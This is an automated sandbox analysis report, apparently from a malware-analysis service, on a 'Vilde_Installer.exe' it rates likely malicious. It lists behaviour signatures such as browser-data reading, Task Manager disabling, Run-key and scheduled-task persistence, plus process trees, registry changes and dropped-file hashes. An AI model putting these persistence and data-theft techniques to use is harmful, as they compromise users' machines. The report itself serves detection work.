Analysis Overview
SHA256
2ac50d15f96dfe78c7df256f995443db82c93e4c746249440d1c0bea315bd78a
Threat Level: Likely malicious
The file Vilde_Installer.exe was found to be: Likely malicious.
Malicious Activity Summary
Disables Task Manager via registry modification
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Reads user/profile data of web browsers
Drops startup file
Checks computer location settings
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Program crash
Unsigned PE
Enumerates physical storage devices
Views/modifies file attributes
Runs net.exe
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Uses Task Scheduler COM API
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
Detects videocard installed
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 00:13
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240508-en
Max time kernel
141s
Max time network
161s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\pt-BR.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240221-en
Max time kernel
125s
Max time network
130s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1676 wrote to memory of 3060 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 1676 wrote to memory of 3060 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 1676 wrote to memory of 3060 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\app-64.7z"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f8
Network
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240508-en
Max time kernel
121s
Max time network
134s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1244 wrote to memory of 2968 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1244 wrote to memory of 2968 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1244 wrote to memory of 2968 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2968 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2968 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2968 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2968 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sw.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\sw.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\sw.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 0b58a7b3c89d3398febfecb8f9db5cb1 |
| SHA1 | 88c8ac85d830c720a255e9509255ca20654e825b |
| SHA256 | cd3963789c8c04fd1b2d705294ab397bb09a1b4347ce8f37ccb12760e226a8c2 |
| SHA512 | 1870b403df107c33669078431a3417006047c241d31e2b88c03c22c7dc80180e7cb8106a2027d458cbe5b7863696580fdfe4eafef519c7879d4ec79d15d74d27 |
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20231129-en
Max time kernel
121s
Max time network
129s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2916 wrote to memory of 2244 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2916 wrote to memory of 2244 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2916 wrote to memory of 2244 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2244 wrote to memory of 2616 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2244 wrote to memory of 2616 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2244 wrote to memory of 2616 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2244 wrote to memory of 2616 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\sr.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\sr.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\sr.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 72c099d847b07ebaa67a766c5676e17a |
| SHA1 | e8e9db6e653713529e74c398eb8725506a64f16e |
| SHA256 | 653b5a9dcd035195efbd7c763db1417c82a82c2869482795dea72a938315f20f |
| SHA512 | f346d454e137de1d2e2154581651b0b005f1b9faddb12de0100495c1fe75351b869eecc833043f2754ca9cf38eec3f050c0b5afc7e2d8aa98186d074c4cf7473 |
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240508-en
Max time kernel
145s
Max time network
152s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 752 wrote to memory of 944 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 752 wrote to memory of 944 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 752 wrote to memory of 944 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 944 -ip 944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 944 -s 612
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:19
Platform
win10v2004-20240226-en
Max time kernel
135s
Max time network
166s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4048 wrote to memory of 3416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4048 wrote to memory of 3416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4048 wrote to memory of 3416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3416 -ip 3416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 628
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4444 --field-trial-handle=2248,i,10247514684337323751,15511974759131734137,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 20.231.121.79:80 | tcp | |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 13.107.246.64:443 | tcp | |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.141.79.40.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20231129-en
Max time kernel
119s
Max time network
122s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 220
Network
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win10v2004-20240508-en
Max time kernel
48s
Max time network
56s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ro.pak
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240220-en
Max time kernel
120s
Max time network
126s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read\command | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\ | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pak\ = "pak_auto_file" | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell | C:\Windows\system32\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\.pak | C:\Windows\system32\rundll32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000_CLASSES\pak_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1992 wrote to memory of 2752 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1992 wrote to memory of 2752 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 1992 wrote to memory of 2752 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2752 wrote to memory of 2440 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2752 wrote to memory of 2440 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2752 wrote to memory of 2440 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2752 wrote to memory of 2440 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\locales\ta.pak
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\locales\ta.pak
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\locales\ta.pak"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 08a411679d9d4a74c405669802058d01 |
| SHA1 | ab6dd3026c4df416ce50c0f9164d07fc38d89f72 |
| SHA256 | 7d4be23c5deaad9ca6d467e85a56ae2391ff15284be5364341a6f91091977ae7 |
| SHA512 | 375249db6c3fb080433c9afa8afd54918e029847157ea83ef129f3673368198ef096390355bc22bec47d8975d733ae61a346d0fa4c004119240def937e29f7d0 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-13 00:12
Reported
2024-06-13 00:18
Platform
win7-20240220-en
Max time kernel
121s
Max time network
125s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1696 wrote to memory of 2200 | N/A | C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe |
| PID 1696 wrote to memory of 2200 | N/A | C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe |
| PID 1696 wrote to memory of 2200 | N/A | C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe |
| PID 1696 wrote to memory of 2200 | N/A | C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe | C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe
"C:\Users\Admin\AppData\Local\Temp\Vilde_Installer.exe"
C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
C:\Users\Admin\AppData\Local\Temp\2hmncsrpDCIgnwkJEmvRXHKWm3g\Vilde_Installer.exe
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
Network
Files
\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\System.dll
| MD5 | 0d7ad4f45dc6f5aa87f606d0331c6901 |
| SHA1 | 48df0911f0484cbe2a8cdd5362140b63c41ee457 |
| SHA256 | 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca |
| SHA512 | c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9 |
\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\nsis7z.dll
| MD5 | 80e44ce4895304c6a3a831310fbf8cd0 |
| SHA1 | 36bd49ae21c460be5753a904b4501f1abca53508 |
| SHA256 | b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592 |
| SHA512 | c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\chrome_100_percent.pak
| MD5 | a0e681fdd4613e0fff6fb8bf33a00ef1 |
| SHA1 | 6789bacfe0b244ab6872bd3acc1e92030276011e |
| SHA256 | 86f6b8ffa8788603a433d425a4bc3c4031e5d394762fd53257b0d4b1cfb2ffa2 |
| SHA512 | 6f6a1a8bfe3d33f3fa5f6134dac7cd8c017e38e5e2a75a93a958addbb17a601c5707d99a2af67e52c0a3d5206142209703701cd3fab44e0323a4553caee86196 |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\chrome_200_percent.pak
| MD5 | c37bd7a6b677a37313b7ecc4ff01b6f5 |
| SHA1 | 79db970c44347bd3566cefb6cabd1995e8e173df |
| SHA256 | 8c1ae81d19fd6323a02eb460e075e2f25aba322bc7d46f2e6edb1c4600e6537a |
| SHA512 | a7b07133fa05593b102a0e5e5788b29488cb74656c5ee25de897c2ba2b2a7b05c0663ade74a003f7d6df2134d0b75f0ad25e15e9c9e0969e9453b7fc40b9f8bb |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\d3dcompiler_47.dll
| MD5 | 2191e768cc2e19009dad20dc999135a3 |
| SHA1 | f49a46ba0e954e657aaed1c9019a53d194272b6a |
| SHA256 | 7353f25dc5cf84d09894e3e0461cef0e56799adbc617fce37620ca67240b547d |
| SHA512 | 5adcb00162f284c16ec78016d301fc11559dd0a781ffbeff822db22efbed168b11d7e5586ea82388e9503b0c7d3740cf2a08e243877f5319202491c8a641c970 |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\ffmpeg.dll
| MD5 | 14e00bf1d9d0df65f8b1a31240d474a8 |
| SHA1 | f9fe033725b7b1b5c0efce7a14ed7ab223cb32e8 |
| SHA256 | 9d1eb0c6eb12bfa87e74a65c2fde5d61c4c93e21fb0800bbdccb6559527036a5 |
| SHA512 | 652724450296a739de802ba8fac482953146f37665718446e448a350295e1e7b09bd460835bcd0ac26b2e54bb9b791624a9eea11e6c96573c7c4aed22450ed14 |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\icudtl.dat
| MD5 | e0f1ad85c0933ecce2e003a2c59ae726 |
| SHA1 | a8539fc5a233558edfa264a34f7af6187c3f0d4f |
| SHA256 | f5170aa2b388d23bebf98784dd488a9bcb741470384a6a9a8d7a2638d768defb |
| SHA512 | 714ed5ae44dfa4812081b8de42401197c235a4fa05206597f4c7b4170dd37e8360cc75d176399b735c9aec200f5b7d5c81c07b9ab58cbca8dc08861c6814fb28 |
C:\Users\Admin\AppData\Local\Temp\nst2F8A.tmp\7z-out\libEGL.dll
| MD5 | 1dcf5ac3cb0dcda9c9679eeb018d01bd |
| SHA1 | bc21697c5665aab5eaaba61f55719d43328f7e7c |
| SHA256 | 9cfc3001191e8b3eb9c96ba29e57e5bf9aaab264e83897e47cb968167a8a811b |
| SHA512 | 47d8769bf00cc7555479542abf5e0684799e424d9801dad8c6bd199680d9c40cfa2380d969515db7a0753cf6f3a9733b5afb931fe33863fe30a37092d8dc96b1 |
